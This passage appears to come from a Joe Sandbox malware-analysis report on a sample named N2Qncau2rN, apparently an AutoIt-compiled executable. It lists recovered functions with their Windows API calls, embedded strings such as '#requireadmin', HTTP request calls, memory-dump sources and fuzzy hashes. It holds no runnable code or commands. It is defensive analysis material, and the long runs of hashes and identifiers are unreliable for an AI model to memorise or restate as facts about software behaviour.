                                                                                                                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                                                                                                                                                                • String ID: %4d%02d%02d%02d%02d%02d
                                                                                                                                                                                                                • API String ID: 2441338619-1568723262
                                                                                                                                                                                                                • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                                                                                                                                                                                • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                                                                                                                                                                Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                                                                                                                • String ID: @COM_EVENTOBJ
                                                                                                                                                                                                                • API String ID: 327565842-2228938565
                                                                                                                                                                                                                • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                                                                                                                                                                • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                                                                                                                                                                Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                                                                                                                                                                • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00470516
                                                                                                                                                                                                                  • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                                                                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                                                                                                                                                                  • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                                                                                                                                                                • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                                                                                                                                                                • String ID: H
                                                                                                                                                                                                                • API String ID: 3613100350-2852464175
                                                                                                                                                                                                                • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                                                                                                                                                                                • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                                                                                                                                                                Function 00401CB0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00426F50
                                                                                                                                                                                                                • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                                                                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                                                                                                                                • String ID: close all
                                                                                                                                                                                                                • API String ID: 4174999648-3243417748
                                                                                                                                                                                                                • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                                                                                                                                                                • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                                                                                                                                                                Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                                                                                                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                                                                                                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                                                                                                                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                                                                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                                                                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                                                                                                                                                                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1291720006-3916222277
                                                                                                                                                                                                                • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                                                                                                                                • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                                                                                                                                                                Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                                                                                                                                                                • IsMenu.USER32(?), ref: 0045FC5F
                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 0045FC97
                                                                                                                                                                                                                • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                                                                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                • String ID: 0$2
                                                                                                                                                                                                                • API String ID: 93392585-3793063076
                                                                                                                                                                                                                • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                                                                                                                                • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                                                                                                                                                                Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00435320
                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                                                                                                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                                                                                                                                                                • String ID: crts
                                                                                                                                                                                                                • API String ID: 586820018-3724388283
                                                                                                                                                                                                                • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                                                                                                                                • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                                                                                                                                                                Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                                                                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0044BCAF
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0044BCBB
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0044BCD1
                                                                                                                                                                                                                • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                                                                                                                                                • String ID: \*.*
                                                                                                                                                                                                                • API String ID: 2326526234-1173974218
                                                                                                                                                                                                                • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                                                                                                                                • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                                                                                                                                                                Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004335F2
                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0043362B
                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                                                                                                                                                                • _wcsrchr.LIBCMT ref: 00433666
                                                                                                                                                                                                                  • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                                                                                                                                                • String ID: \
                                                                                                                                                                                                                • API String ID: 321622961-2967466578
                                                                                                                                                                                                                • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                                                                                                                                                                • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                                                                                                                                                                Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __wcsnicmp
                                                                                                                                                                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                                                                                • API String ID: 1038674560-2734436370
                                                                                                                                                                                                                • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                                                                                                                                                                • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                                                                                                                                                                Function 00434034 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                                                                                                                                                                                • LoadStringW.USER32(00000000), ref: 00434060
                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                                                                                                                                                                • LoadStringW.USER32(00000000), ref: 00434078
                                                                                                                                                                                                                • _wprintf.LIBCMT ref: 004340A1
                                                                                                                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                                                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                • API String ID: 3648134473-3128320259
                                                                                                                                                                                                                • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
